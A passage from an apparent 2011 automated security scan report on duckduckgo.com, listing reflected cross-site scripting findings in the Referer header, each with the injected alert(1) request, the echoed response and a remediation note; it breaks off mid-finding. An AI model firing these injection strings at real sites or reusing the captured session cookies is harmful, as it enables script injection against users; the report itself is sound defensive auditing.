Cache-Control: max-age=1
Content-Length: 13177

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Web_security_exploits"/><meta http-equiv="cont
...[SNIP]...
script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=1;iaq=0;r1hc=0;r1c=7;r2c=6;ric=13;rq='cc8c8'-alert(1)-'a97d2817fca';rfq=1;rt='';rv='';rad='en.wikipedia.org';rds=20;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv
...[SNIP]...

3.211. http://duckduckgo.com/HTTP_referrer [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /HTTP_referrer

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /HTTP_referrer HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=4c75c'-alert(1)-'1b74049d74f

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:54:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:55:00 GMT
Cache-Control: max-age=1
Content-Length: 8717

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/HTTP_headers"/><meta http-equiv="content-type"
...[SNIP]...
<script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=1;iaq=0;r1hc=0;r1c=1;r2c=3;ric=3;rq='4c75c'-alert(1)-'1b74049d74f';rfq=1;rt='';rv='';rad='en.wikipedia.org';rds=20;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv
...[SNIP]...

3.212. http://duckduckgo.com/Microsoft_Visual_Studio [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /Microsoft_Visual_Studio

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Microsoft_Visual_Studio HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=b2728'-alert(1)-'b073c849a2c

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:47:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:47:16 GMT
Cache-Control: max-age=1
Content-Length: 9475

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Microsoft_Visual_Studio"/><meta http-equiv="co
...[SNIP]...
<script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=1;iaq=0;r1hc=0;r1c=2;r2c=2;ric=5;rq='b2728'-alert(1)-'b073c849a2c';rfq=1;rt='';rv='';rad='en.wikipedia.org';rds=20;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv
...[SNIP]...

3.213. http://duckduckgo.com/NaN [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /NaN

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NaN HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=fbcde'-alert(1)-'e8ddd594df0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlMzczNjM5MmY5OTgxY2Y0MjBkNjIzZDg1ZDBiNzA0MmE%3D--3e8d70a971450d94414e9de9c563709ccf72716e; r=b

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:04:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Tue, 01 Mar 2011 02:04:48 GMT
Cache-Control: max-age=1
Content-Length: 9228

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Computing_acronyms"/><meta http-equiv="content
...[SNIP]...
<script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=1;iaq=0;r1hc=0;r1c=2;r2c=3;ric=5;rq='fbcde'-alert(1)-'e8ddd594df0';rfq=1;rt='';rv='';rad='en.wikipedia.org';rds=20;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv
...[SNIP]...

3.214. http://duckduckgo.com/User_agent [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /User_agent

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /User_agent HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=b290c'-alert(1)-'64b49af1d9d

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:55:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:55:02 GMT
Cache-Control: max-age=1
Content-Length: 9737

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/HTTP_headers"/><meta http-equiv="content-type"
...[SNIP]...
<script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=1;iaq=0;r1hc=0;r1c=2;r2c=6;ric=5;rq='b290c'-alert(1)-'64b49af1d9d';rfq=1;rt='';rv='';rad='en.wikipedia.org';rds=20;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv
...[SNIP]...

3.215. http://duckduckgo.com/c/Computer_arithmetic [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /c/Computer_arithmetic

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/Computer_arithmetic HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=ac320'-alert(1)-'ffcf9437e4e

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:49:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:49:55 GMT
Cache-Control: max-age=1
Content-Length: 59532

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Computer_arithmetic"/><meta http-equiv="conten
...[SNIP]...
ript type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=0;it=1;iaq=0;r1hc=0;r1c=126;r2c=0;ric=37;rq='ac320'-alert(1)-'ffcf9437e4e';rfq=1;rt='';rv='';rad='';rds=0;rs=1;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv='';kx='';</scrip
...[SNIP]...

3.216. http://duckduckgo.com/c/Computing_acronyms [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /c/Computing_acronyms

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/Computing_acronyms HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=b2e4e'-alert(1)-'82df481cf11

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:49:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:49:03 GMT
Cache-Control: max-age=1
Content-Length: 26257

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Computing_acronyms"/><meta http-equiv="content
...[SNIP]...
cript type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=0;it=1;iaq=0;r1hc=0;r1c=40;r2c=0;ric=14;rq='b2e4e'-alert(1)-'82df481cf11';rfq=1;rt='';rv='';rad='';rds=0;rs=1;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv='';kx='';</scrip
...[SNIP]...

3.217. http://duckduckgo.com/c/Software_anomalies [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /c/Software_anomalies

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/Software_anomalies HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=a7676'-alert(1)-'4ddb0e8f6ce

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:48:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:48:58 GMT
Cache-Control: max-age=1
Content-Length: 16344

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Software_anomalies"/><meta http-equiv="content
...[SNIP]...
script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=0;it=1;iaq=0;r1hc=0;r1c=28;r2c=0;ric=9;rq='a7676'-alert(1)-'4ddb0e8f6ce';rfq=1;rt='';rv='';rad='';rds=0;rs=1;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv='';kx='';</scrip
...[SNIP]...

3.218. http://duckduckgo.com/c/The_Simpsons_characters [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /c/The_Simpsons_characters

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/The_Simpsons_characters HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=c894a'-alert(1)-'54b75bb1ae9

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:48:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:48:37 GMT
Cache-Control: max-age=1
Content-Length: 29088

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/The_Simpsons_characters"/><meta http-equiv="co
...[SNIP]...
cript type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=0;it=1;iaq=0;r1hc=0;r1c=43;r2c=0;ric=44;rq='c894a'-alert(1)-'54b75bb1ae9';rfq=1;rt='';rv='';rad='';rds=0;rs=1;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv='';kx='';</scrip
...[SNIP]...

3.219. http://duckduckgo.com/e.js [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /e.js

Request

GET /e.js HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=9b7cf"><script>alert(1)</script>141e444a1cc

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:47:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Sun, 12 Nov 1999 20:28:05 GMT
Content-Length: 1456

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="robots" content="no
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=9b7cf"><script>alert(1)</script>141e444a1cc">
...[SNIP]...

3.220. https://duckduckgo.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?q=POST+request HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=51061'-alert(1)-'cf1ebc4b3b

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:56:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:56:11 GMT
Cache-Control: max-age=1
Content-Length: 7966

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta name="robots" content="noindex,nofollow"><meta http-equiv="content-type" content="text/html;
...[SNIP]...
<script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=0;iaq=0;r1hc=0;r1c=1;r2c=0;ric=3;rq='51061'-alert(1)-'cf1ebc4b3b';rfq=1;rt='';rv='';rad='';rds=20;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv='';kx='';</scri
...[SNIP]...

3.221. https://duckduckgo.com/Electronic_Frontier_Foundation [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /Electronic_Frontier_Foundation

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Electronic_Frontier_Foundation HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=b1eb2'-alert(1)-'86f5e73252a

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:57:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:57:13 GMT
Cache-Control: max-age=1
Content-Length: 12991

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Electronic_Frontier_Foundation"/><meta http-eq
...[SNIP]...
script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=1;iaq=0;r1hc=0;r1c=2;r2c=19;ric=5;rq='b1eb2'-alert(1)-'86f5e73252a';rfq=1;rt='';rv='';rad='secure.wikimedia.org';rds=20;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='
...[SNIP]...

3.222. https://duckduckgo.com/HTTP_Secure [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /HTTP_Secure

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /HTTP_Secure HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=55518'-alert(1)-'ecf4c5701fe

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:57:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:57:12 GMT
Cache-Control: max-age=1
Content-Length: 13106

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Secure_communication"/><meta http-equiv="conte
...[SNIP]...
script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=1;iaq=0;r1hc=0;r1c=7;r2c=8;ric=13;rq='55518'-alert(1)-'ecf4c5701fe';rfq=1;rt='';rv='';rad='secure.wikimedia.org';rds=20;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='
...[SNIP]...

3.223. https://duckduckgo.com/HTTP_cookie [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /HTTP_cookie

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /HTTP_cookie HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=31367'-alert(1)-'39526ed110b

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:57:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:57:10 GMT
Cache-Control: max-age=1
Content-Length: 13375

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Internet_privacy"/><meta http-equiv="content-t
...[SNIP]...
script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=1;iaq=0;r1hc=0;r1c=7;r2c=7;ric=13;rq='31367'-alert(1)-'39526ed110b';rfq=1;rt='';rv='';rad='secure.wikimedia.org';rds=20;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='
...[SNIP]...

3.224. https://duckduckgo.com/IP_Address [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /IP_Address

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /IP_Address HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=d4e16'-alert(1)-'40538310d83

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:57:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Tue, 01 Mar 2011 02:57:12 GMT
Cache-Control: max-age=1
Content-Length: 10016

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/c/Internet_Protocol"/><meta http-equiv="content-
...[SNIP]...
<script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=1;iaq=0;r1hc=0;r1c=1;r2c=8;ric=3;rq='d4e16'-alert(1)-'40538310d83';rfq=1;rt='';rv='';rad='secure.wikimedia.org';rds=20;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='
...[SNIP]...

3.225. https://duckduckgo.com/e.js [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /e.js

Request

GET /e.js HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;
Referer: http://www.google.com/search?hl=en&q=79b8b"><script>alert(1)</script>c5a552df2ab

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:56:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Sun, 12 Nov 1999 20:28:05 GMT
Content-Length: 1456

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="robots" content="no
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=79b8b"><script>alert(1)</script>c5a552df2ab">
...[SNIP]...

3.226. https://duckduckgo.com/e.js [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /e.js

Request

